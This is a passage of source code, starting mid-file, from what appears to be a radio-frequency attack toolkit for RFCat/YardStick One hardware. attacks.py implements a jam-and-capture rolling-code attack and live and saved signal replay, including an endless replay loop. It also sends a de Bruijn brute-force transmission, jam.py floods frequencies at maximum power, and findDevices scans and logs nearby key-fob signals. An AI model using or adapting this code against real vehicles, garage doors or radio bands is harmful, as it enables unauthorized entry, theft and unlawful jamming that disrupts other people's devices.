 87 | def parseDeviceSettings(file_data):
 88 |     '''Parse file device configuration and return list'''
 89 |     settings = []
 90 |     for data in file_data:
 91 |         settings.append(re.split(':', data))
 92 |     print (settings)
 93 |     return settings
 94 | 
 95 | 
 96 | #------------ Hex conversion function --------------------#
 97 | def printFormatedHex(payload):
 98 |     ''' Helper function that takes RFRecv output and returns format hex
 99 |     Note dont just use this output into your send, but you can manually paste its output in a string'''
100 | 
101 |     formatedPayload = ""
102 |     if (len(payload) % 2 == 0):
103 |         print (f"The following payload is currently being formated: {payload}")
104 |         iterator = iter(payload)
105 |         for i in iterator:
106 |             formatedPayload += ('\\x'+i + next(iterator))
107 | 
108 |     return formatedPayload
109 | 
110 | 
111 | #------------Create Payloads in Bytes--------------------#
112 | def createBytesFromPayloads(payloads):
113 |     '''Accepts a list of payloads for formating and returns a list formated in byte format
114 |        For RFXmit transmission'''
115 |     formatedPayloads = []
116 | 
117 |     for payload in payloads:
118 |         binary = bin(int(payload,16))[2:]
119 |         formatedPayloads.append(turnToBytes(binary))
120 |     return formatedPayloads
121 | 
122 | def turnToBytes(binary):
123 |     ''' Converts binary payloads into sendable byte payloads'''
124 |     payloadBytes = bitstring.BitArray(bin=(binary)).tobytes()
125 |     return payloadBytes
126 | 
127 | #------------Send Transmission--------------------#
128 | def sendTransmission(payload, d):
129 |     ''' Expects formated data for sending with RFXMIT'''
130 |     print ("Sending payload... ")
131 |     d.RFxmit(payload,10)
132 |     print ("Transmission Complete")
133 | 
134 | #-------------------Parse the log file------------#
135 | def parseSignalsFromLog(log_file):
136 |     '''Creates a multidimentional array of signals from a logfile split by 0000's'''
137 |     payloads=[]
138 |     with open(log_file) as f:
139 |         for line in f:
140 |             if "found" not in line:
141 |                 payloads.append(splitCaptureByZeros(line))
142 |     return payloads
143 | 
144 | def similar(a, b):
145 |     return SequenceMatcher(None, a, b).ratio()
146 | 
147 | #-------------------Parse single Log Entry From live Clicker------------#
148 | def parseSignalsLive(click):
149 |     '''Creates a multidimentional array of signals from a logfile split by 0000's'''
150 |     payloads=[]
151 |     payloads.append(splitCaptureByZeros(click))
152 |     return payloads
153 | 


--------------------------------------------------------------------------------
/src/RFSettings.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | sys.dont_write_bytecode = True
 3 | 
 4 | class RFSettings():
 5 |     '''This class is used to setup RFCat settings needed for listening, jamming and sending'''
 6 |     def __init__(self, frequency, baud_rate, channel_bandwidth, modulation_type, upper_rssi, lower_rssi, channel_spacing, deviation):
 7 | 
 8 |         self.frequency = frequency
 9 |         self.baud_rate = baud_rate
10 |         self.channel_bandwidth = channel_bandwidth
11 |         self.modulation_type = modulation_type
12 |         self.upper_rssi = upper_rssi
13 |         self.lower_rssi = lower_rssi
14 |         self.channel_spacing = channel_spacing
15 |         self.deviation = deviation
16 | 
17 |     def saveDeviceSettingsTemplate(self, rf_settings, device_name):
18 |         '''Saves your current RF settings to a file in the device_templates folder which can be loaded in a later attack'''
19 |         try:
20 |             with open("./device_templates/"+device_name+".config", 'w') as file:
21 |                 for key, value in rf_settings.__dict__.items():
22 |                     if not key.startswith("__"):
23 |                         print(f"{str(key)} : {str(value)}")
24 |                         file.write(str(key)+ ":" +str(value) +"\n")
25 |                 print(f"Saved file as: ./device_templates/{device_name}.config")
26 |         except IOError as e:
27 |             print(f"Error saving device settings: {e}")
28 |         
29 |     def loadDeviceSettingsTemplate(self, file_data):
30 |         '''Loads your previously saved working settings for attack against a device'''
31 |         try:
32 |             for data in file_data:
33 |                 if "frequency" in data:
34 |                     frequency = self.splitData(data)
35 |                     self.frequency = int(frequency)
36 |                 elif "baud_rate" in data:
37 |                     baud_rate = self.splitData(data)
38 |                     self.baud_rate = int(baud_rate)
39 |                 elif "channel_bandwidth" in data:
40 |                     channel_bandwidth = self.splitData(data)
41 |                     self.channel_bandwidth = int(channel_bandwidth)
42 |                 elif "modulation_type" in data:
43 |                     modulation_type = self.splitData(data)
44 |                     self.modulation_type = modulation_type
45 |                 elif "upper_rssi" in data:
46 |                     upper_rssi = self.splitData(data)
47 |                     self.upper_rssi = int(upper_rssi)
48 |                 elif "lower_rssi" in data:
49 |                     lower_rssi = self.splitData(data)
50 |                     self.lower_rssi = int(lower_rssi)
51 |                 elif "channel_spacing" in data:
52 |                     channel_spacing = self.splitData(data)
53 |                     self.channel_spacing = int(channel_spacing)
54 |                 elif "deviation" in data:
55 |                     deviation = self.splitData(data)
56 |                     self.deviation = int(deviation)
57 |         except Exception as e:
58 |             print(f"Error loading device settings: {e}")        
59 |         self.printSettings()
60 | 
61 |     def splitData(self, data):
62 |         key, value = data.split(":")
63 |         value = value.strip()
64 |         return value
65 | 
66 |     def printSettings(self):
67 |         '''Prints the current RFCat Settings in use'''
68 |         print ("The following settings are in use:")
69 |         print (f"Frequency: {str(self.frequency)}")
70 |         print (f"Baud_rate: {str(self.baud_rate)}")
71 |         print (f"Channel_bandwidth: {str(self.channel_bandwidth)}")
72 |         print (f"Modulation_type: {str(self.modulation_type)}")
73 |         print (f"Upper_rssi: {str(self.upper_rssi)}")
74 |         print (f"Lower_rssi: {str(self.lower_rssi)}")
75 |         print (f"Channel_spacing: {str(self.channel_spacing)}")
76 |         print (f"Deviation: {str(self.deviation)}")
77 | 


--------------------------------------------------------------------------------
/src/__init__.py:
--------------------------------------------------------------------------------
1 | from . import *
2 | import sys
3 | sys.dont_write_bytecode = True
4 | 


--------------------------------------------------------------------------------
/src/attacks.py:
--------------------------------------------------------------------------------
  1 | 
  2 | from . import RFFunctions as tools
  3 | from . import findDevices, jam, utilities
  4 | import time, sys
  5 | sys.dont_write_bytecode = True
  6 | #-----------------Rolling Code-------------------------#
  7 | def rollingCode(d, rf_settings, rolling_code, jamming_variance,):
  8 |     '''Sets up for a rolling code attack, requires a frequency
  9 |     and a RFCat Object'''
 10 | 
 11 |     print("ROLLING CODE REQUIRES 2 YardSticks Plugged In")
 12 |     j = jam.setupJammer(1, rf_settings)
 13 | 
 14 |     jam.jamming(j, "start", rf_settings, rolling_code, jamming_variance)
 15 |     roll_captures, signal_strength = tools.capturePayload(d, rolling_code, rf_settings)
 16 |     print("Waiting to capture your rolling code transmission")
 17 |     print(signal_strength)
 18 |     print(roll_captures)
 19 | 
 20 |     payloads = tools.createBytesFromPayloads(roll_captures)
 21 | 
 22 |     time.sleep(1)
 23 |     jam.jamming(j, "stop", rf_settings, rolling_code, jamming_variance)
 24 | 
 25 |     print("Sending First Payload ")
 26 |     tools.sendTransmission(payloads[0] ,d)
 27 |     response = input( "Ready to send second Payload?? (y/n) ")
 28 |     if response.lower() == "y":
 29 |         tools.sendTransmission(payloads[1] ,d)
 30 | 
 31 |     else:
 32 |         response = input( "Choose a name to save your file as and press enter: ")
 33 |         try:
 34 |             with open("./captures/"+response+".cap", 'w') as file:
 35 |                 file.write(roll_captures[1])
 36 |             print(f"Saved file as: ./captures/{response}.cap  You can manually replay this later with -s -u")
 37 |         except IOError as e:
 38 |             print(f"Error saving file: {e}")
 39 |     return
 40 | #------------------End Roll Code-------------------------#
 41 | 
 42 | 
 43 | #---------------Replay Live Capture----------------------#
 44 | def replayLiveCapture(d, rolling_code, rf_settings):
 45 |     '''Replays a live capture real time, lets you select your capture
 46 |     and replay it or save it for later'''
 47 | 
 48 |     replay_capture, signal_strength = tools.capturePayload(d,rolling_code, rf_settings)
 49 |     replay_capture = [replay_capture]
 50 | 
 51 |     response = input( "Replay this capture? (y/n) ")
 52 |     if response.lower() == 'y':
 53 |         payloads = tools.createBytesFromPayloads(replay_capture)
 54 |         for payload in payloads:
 55 |             print("WAITING TO SEND")
 56 |             time.sleep(1)
 57 |             tools.sendTransmission(payload ,d)
 58 | 
 59 |     response = input( "Save this capture for later? (y/n) ")
 60 |     if response.lower() == 'y':
 61 |         mytime = time.strftime('%b%d_%X')
 62 |         with open("./captures/"+mytime+"_payload.cap", 'w') as file:
 63 |             file.write(replay_capture[0])
 64 |         print(f"Saved file as: ./captures/{mytime}_payload.cap")
 65 |     return
 66 | #---------------End Replay Live Capture-------------------#
 67 | 
 68 | 
 69 | #---------------Replay Saved Capture----------------------#
 70 | def replaySavedCapture(d, uploaded_payload):
 71 |     '''Used to import an old capture and replay it from a file'''
 72 |     with open(uploaded_payload) as f:
 73 |         payloads = f.readlines()
 74 |         print(payloads)
 75 |         payloads = tools.createBytesFromPayloads(payloads)
 76 | 
 77 |         response = input( "Send once, or forever? (o/f) Default = o ")
 78 | 
 79 |         if response.lower() == "f":
 80 |             print("\nNOTE: TO STOP YOU NEED TO CTRL-Z and Unplug/Plug IN YARDSTICK-ONE\n")
 81 |             while True:
 82 |                 for payload in payloads:
 83 |                     print("WAITING TO SEND")
 84 |                     time.sleep(1)          #You may not want this if you need rapid fire tx
 85 |                     tools.sendTransmission(payload ,d)
 86 | 
 87 |         else:
 88 |             for payload in payloads:
 89 |                     print("WAITING TO SEND")
 90 |                     time.sleep(1)
 91 |                     tools.sendTransmission(payload ,d)
 92 |     return
 93 | #--------------- End Replay Saved Capture-------------------#
 94 | 
 95 | 
 96 | #---------------Send DeBruijn Sequence Attack----------------------#
 97 | # https://en.wikipedia.org/wiki/De_Bruijn_sequence
 98 | def deBruijn(d):
 99 |     '''Send Binary deBruijn payload to bruteforce a signal'''
100 |     try:
101 |         response = input( "What length deBruijn would you like to try: ")
102 |         length = int(response)
103 |     except ValueError:
104 |         print("Invalid input. Please enter a valid integer.")
105 |         return
106 |     try:
107 |         binary = utilities.generate_de_bruijn_sequence(2, response)
108 |         payload = tools.turnToBytes(binary)
109 |         
110 |         print(f"Sending {str(len(binary))} bits length binary deBruijn payload formated to bytes")
111 |         print(f'Payload used {payload}')
112 |         tools.sendTransmission(payload ,d)
113 |         
114 |     except Exception as e:
115 |         print(f"Error creating or sending deBruijn payload: {e}")
116 | #----------------- End DeBruijn Sequence Attack--------------------#
117 | 


--------------------------------------------------------------------------------
/src/findDevices.py:
--------------------------------------------------------------------------------
 1 | from rflib import *
 2 | import time, re, sys
 3 | sys.dont_write_bytecode = True
 4 | 
 5 | capture = ""
 6 | mytime = time.strftime('%b%d_%X')
 7 | 
 8 | def bruteForceFreq(d, rf_settings, interval, clicker=False):
 9 |     '''Brute Forces frequencies looking for one with data being sent
10 |        Requires a RFCat Class, a starting frequency and the incrementing interval
11 |        EX: 315000000, 50000'''
12 |     d.setFreq(rf_settings.frequency)
13 |     current_freq = rf_settings.frequency
14 |     filename = "./scanning_logs/"+mytime+".log"
15 | 
16 |     while not keystop():
17 |         print (f"Currently Scanning: {str(current_freq)} To cancel hit enter and wait a few seconds")
18 |         sniffFrequency(d, current_freq, filename, clicker)
19 | 
20 |         current_freq +=interval
21 |         d.setFreq(current_freq)
22 |     print (f"Saved logfile as: ./scanning_logs/{mytime}.log")
23 | 
24 | def searchKnownFreqs(d, known_frequencies, clicker=False):
25 |     '''Sniffs on a rotating list of known frequences from the default list
26 |         or optionally uses a list provided to the function requires an RFCat class'''
27 |     filename = "./scanning_logs/"+mytime+".log"
28 |     while not keystop():
29 | 
30 |         for current_freq in known_frequencies:
31 |             d.setFreq(current_freq)
32 |             print(f"Currently Scanning: {str(current_freq)} To cancel hit enter and wait a few seconds")
33 |             #print <-- wtf do I have a print here for? removed see if it breaks something
34 |             if clicker:
35 |                 sniffFrequency(d, current_freq, "./captures/capturedClicks.log", clicker)
36 |             else:
37 |                 sniffFrequency(d, current_freq, filename, clicker)
38 |     print(f"Saved logfile as: {filename}")
39 | 
40 | def sniffFrequency(d, current_freq, filename, clicker):
41 |     ''' Sniffs on a frequency, requires a RFCat Class with proper info set for listening'''
42 | 
43 |     if clicker:
44 |         while True:
45 |             try:
46 |                 y, z = d.RFrecv()
47 |                 capture = y.hex()
48 |                 print(capture)
49 |                 saveLogs(current_freq, capture, filename)
50 |             except ChipconUsbTimeoutException:
51 |                 pass
52 | 
53 |     else:
54 |         try:
55 |             y, z = d.RFrecv(timeout=3000)
56 |             capture = y.hex()
57 |             print(capture)
58 |             saveLogs(current_freq, capture, filename)
59 |         except ChipconUsbTimeoutException:
60 |             pass
61 |         return
62 | 
63 | def saveLogs(current_freq, capture, filename=" "):
64 |     ''' Used to create logs for scanning known and bruteforcing frequencies'''
65 |     with open(filename, 'a+') as file:
66 |         file.write("A signal was found on :" + str(current_freq)+"\n" + capture+"\n")
67 | 


--------------------------------------------------------------------------------
/src/jam.py:
--------------------------------------------------------------------------------
 1 | from rflib import *
 2 | import sys
 3 | sys.dont_write_bytecode = True
 4 | 
 5 | def setupJammer(idx_value, rf_settings):
 6 |     '''Used to setup jammer with second card for a Rolling Code attack or single for other attacks'''
 7 |     try:
 8 |         j = RfCat(idx=idx_value)
 9 |         j.setMdmModulation(MOD_ASK_OOK)
10 |         j.setMdmDRate(rf_settings.baud_rate)# how long each bit is transmited for
11 |         j.setMdmChanBW(60000)# how wide channel is
12 |         j.setMdmChanSpc(rf_settings.channel_spacing)
13 |         j.setMaxPower()
14 |         #j.setRFRegister(PA_TABLE0, 0xFF)
15 |         #j.setRFRegister(PA_TABLE1, 0xFF)
16 |         j.setRFRegister(PKTCTRL1, 0xFF)
17 |         j.setChannel(0)
18 |         return j
19 |     
20 |     except Exception as e:
21 |         print(f"Error setting up jammer: {e}")
22 |         return None
23 | 
24 | def jamming(j, action, rf_settings, rolling_code, jamming_variance=0, retries=3):
25 |     '''This is used to Jam frequencies with the parameters you set either
26 |     stand alone or for rolling code attacks using jamming variance'''
27 |     if j is None:
28 |         print("Jammer setup failed. Cannot proceed with jamming.")
29 |         return
30 | 
31 |     try:
32 |         frequency = rf_settings.frequency + jamming_variance
33 |         j.setFreq(frequency)
34 | 
35 |         if action == "start":
36 |             print(f"Starting Jamming on: {frequency}")
37 |             print("Press enter to stop jamming \n")
38 |             for attempt in range(retries):
39 |                 try:
40 |                     while not keystop():
41 |                         j.RFxmit(b"A" * 1000)  # send a continuous stream of data to jam the frequency
42 | 
43 |                     if not rolling_code:
44 |                         print("done")
45 |                         j.setModeIDLE()
46 |                     break
47 | 
48 |                 except Exception as e:
49 |                     print(f"Error during jamming attempt {attempt + 1}: {e}")
50 |                     if attempt < retries - 1:
51 |                         print("Retrying...")
52 |                         time.sleep(1)
53 |                     else:
54 |                         print("Max retries reached. Jamming failed.")
55 |         elif action == "stop":
56 |             j.setModeIDLE()  # put dongle in idle mode to stop jamming
57 |             print("Jamming Stopped")
58 |     except Exception as e:
59 |         print(f"Error during jamming: {e}")
60 | 


--------------------------------------------------------------------------------
/src/utilities.py:
--------------------------------------------------------------------------------
 1 | import time, os
 2 | from . import findDevices
 3 | from . import RFFunctions as tools
 4 | from . import Clicker
 5 | 
 6 | #-----------------Start Log Tailing ----------------#
 7 | def logTail(my_clicker):
 8 |     ''' This function acts as a linux tail function but only pulling new additions to a file since running
 9 |     it parses for payload lines which is uses in analysis and graphing'''
10 |     capture_log = "./captures/capturedClicks.log"
11 |     try:
12 |         with open(capture_log, 'r') as file:
13 | 
14 |             #Find the size of the file and move to the end
15 |             st_results = os.stat(capture_log)
16 |             st_size = st_results[6]
17 |             file.seek(st_size)
18 | 
19 |             while True:
20 |                 where = file.tell()
21 |                 line = file.readline()
22 |                 if not line:
23 |                     time.sleep(1)
24 |                     file.seek(where)
25 |                 else:
26 |                     if "found" not in line:
27 |                         presses = tools.parseSignalsLive(line)
28 |                         my_clicker.keyfob_payloads = presses
29 |                         percent = my_clicker.liveClicks()
30 |     
31 |     except IOError as e:
32 |         print(f"Error opening or reading from {capture_log}: {e}")
33 | 
34 | #-----------------End Log Tailing ----------------#
35 | 
36 | 
37 | #-----------------Start De Bruijn Creation ----------------#
38 | def generate_de_bruijn_sequence(k, n):
39 |     '''Generates the de Bruijn sequence for given k and n'''
40 |     if isinstance(k, str):
41 |         alphabet = list(k)
42 |         k = len(alphabet)
43 |     else:
44 |         alphabet = list(map(str, range(k)))
45 | 
46 |     a = [0] * (k * int(n))
47 |     sequence = []
48 | 
49 |     def db(t, p):
50 |         if t == int(n) * k:
51 |             if int(n) % p == 0:
52 |                 sequence.extend(a[1:p + 1])
53 |         else:
54 |             a[t] = a[t - p]
55 |             db(t + 1, p)
56 |             for j in range(a[t - p] + 1, k):
57 |                 a[t] = j
58 |                 db(t + 1, t)
59 |     db(1, 1)
60 |     return "".join(alphabet[i] for i in sequence)
61 | 
62 | #-----------------End De Bruijn Creation ----------------#
63 | 
64 | def count_provided_args(args, parser):
65 |     # Count arguments that were explicitly provided by the user
66 |     provided_args = 0
67 |     for action in parser._actions:
68 |         # Skip the help action
69 |         if action.dest == 'help':
70 |             continue
71 |         
72 |         # Check if the argument was provided by the user
73 |         if hasattr(args, action.dest):
74 |             value = getattr(args, action.dest)
75 |             
76 |             # For store_true actions, check if they were explicitly set
77 |             if action.const is not None and value == action.const:
78 |                 provided_args += 1
79 |             
80 |             # For other arguments, check if they differ from the default
81 |             elif hasattr(action, 'default'):
82 |                 if value != action.default:
83 |                     provided_args += 1
84 |     
85 |     return provided_args
86 | 


--------------------------------------------------------------------------------